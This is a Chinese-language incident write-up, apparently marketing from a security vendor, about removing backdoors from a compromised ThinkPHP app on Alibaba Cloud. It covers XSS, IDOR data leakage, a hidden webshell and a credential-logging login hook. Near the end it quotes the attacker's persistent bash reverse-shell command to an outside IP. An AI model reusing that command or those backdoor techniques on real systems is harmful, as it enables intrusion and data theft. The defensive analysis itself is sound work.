阿里雲異常流量及異常網路連線的安全解決過程

相信有很多站長以及運營網站或APP的技術人員都有一些安全上的困擾，尤其是對網站程式碼裡存在後門檔案，以及伺服器被植入木馬病毒的安全問題很鬧心，前段時間我們SINE安全接到客戶的安全諮詢，說是找的第三方開發公司做的APP和後臺，運營了起來差不多3個月，一開始註冊的會員量不是很多，當註冊達到成千上萬個會員註冊量的時候,就相繼出現了安全上的問題，資料庫總是被篡改，會員資訊洩露，以及被阿里雲提示的雲安全中心，安全事件提醒，尊敬的*玉:雲盾雲安全中心檢測到您的伺服器:47.180.*.*(主伺服器)出現了緊急安全事件:自啟動後門，建議您立即進行處理。程式異常行為-反彈Shell和異常網路連線-反彈shell網路外連以及惡意指令碼程式碼執行還有Linux可疑命令序列惡意軟體-後門程式等告警，針對這些安全問題，SINE安全老於來給大家科普一下，如何去除網站後門木馬以及程式碼漏洞檢測等問題。

攻擊情況介紹：

當天我們SINESAFE收到客戶的電話諮詢，客戶的平臺、APP和H5端、以及後臺遭到駭客入侵，並篡改了資料庫裡面的資料，導致平臺的損失過萬，詳細詢問了客戶的平臺架構以及部署的伺服器數量，發現客戶用的是Thinkphp架構開發，APP的API介面和H5端以及後臺管理都是在該架構的基礎上開發的，因為這套程式碼是客戶從買來後找的第三方公司進行的二次開發，第三方開發公司對裡面的程式碼後門並不清楚，很多低價賣原始碼的，肯定是有利益可圖的。建議大家買來後一定要對網站原始碼進行程式碼安全審計和網站後門審計服務，尤其是對準備剛上線的APP平臺，對安全問題要重視起來，否則到了後期會員規模上來後，損失的就不止這一點了。

跟客戶進行了詳細的對接，梳理了所有的伺服器的資訊以及網站原始碼的位置，我們的SINE安全工程師立即將程式碼打包到本地，進行原始碼安全審計，透過對使用者註冊以及APP裡的具體功能程式碼，都進行了全面的人工漏洞測試，發現在留言反饋以及會員資訊功能，存在XSS跨站漏洞，這個漏洞可以將XSS攻擊程式碼植入到後臺裡去，當後臺的管理人員檢視了反饋的留言或使用者的個人詳情，就會直接觸發該XSS漏洞，XSS漏洞可以獲取到網站後臺的地址，以及管理員的Session和cookies，有了這2個值，駭客就可以登入後臺了，對APP裡的API介面也進行詳細的安全審計，發現存在會員資訊洩露漏洞，由於未對UID值進行當前賬號許可權判斷，可以越權檢視其它UID的會員資訊，像手機號以及註冊時間，銀行卡，錢包地址，密碼等等的資訊，都可以越權檢視，我們SINE安全工程師對程式碼中的一些函式功能程式碼進行審計，檢測出了原始碼作者留的一句話木馬後門，而且還是加密形式免殺webshell，程式碼如下：

真是道高一尺魔高一丈，原始碼作者留的後門，手段非常高，一般的建站公司技術是沒辦法看出這個檔案是木馬程式碼的，我們對其網站的訪問日誌以及APP的介面日誌進行人工檢查，還發現了後臺登入這裡被駭客動了手腳，只要管理員登入成功會立即把使用者名稱和密碼寫到/data/目錄下的robots.txt檔案中，建議大家日後做檢查程式碼的時候先搜尋下_encode關鍵詞看看有沒有可疑的，以及搜尋關鍵詞eval函式的都有哪些再呼叫，因為很多一句話木馬都是呼叫的eval函式，透過對每個程式碼的安全審計發現上傳功能的程式碼中存在上傳後門具體程式碼如下：

後門真是太多了，防不勝防，辛虧客戶找到了我們SINE安全對網站程式碼進行了詳細的安全審計和漏洞測試，我們對網站的上傳的目錄進行了指令碼執行許可權控制，對eval的後門進行了強制刪除，以及對管理後臺登入這裡的後門進行了修復，對一些XSS跨站攻擊的程式碼進行了攻擊防護，對所有get post變數提交的引數進行了安全過濾，凡是包含xss跨站程式碼的，以及非法植入攻擊程式碼的都進行了攔截過濾，並對整套程式碼進行了安全加固與防護，也同時對伺服器進行了埠安全策略部署和基礎安全設定，如登錄檔許可權，環境執行賬戶許可權，mysql資料庫的許可權分離設定，以及nginx的執行賬戶進行了設定，防止透過網站後門木馬進行提權拿到伺服器許可權，如果想要對網站程式碼進行後門查詢和清除和漏洞人工測試服務的可以向網站漏洞修復服務商SINE安全或鷹盾安全以及啟明星辰，大樹安全等這些服務商尋求技術支援。針對阿里雲的雲安全中心安全事件提醒，我們讓客戶提供了阿里雲賬號和密碼，登入後，對該安全事件的詳情進行了檢視，發現確實是駭客植入了自啟動的後門，我們對Linux系統的自啟動服務進行了檢視，發現駭客植入的木馬病毒，每次重啟伺服器都會自動啟動該服務，向外傳送連線請求，Command: bash -i >& / dev/tcp/1.15.235.160/25670>&1 該命令是直接反彈了Linux root SHELL到1.15.235.160駭客的伺服器。我們對該IP進行了阿里雲安全組IP限制，以及對系統裡的自啟動服務進行了刪除與防篡改部署，至此客戶的APP被駭客攻擊以及篡改資料的問題得到了徹底的解決。也希望我們的解決過程分享，能幫到更多的人。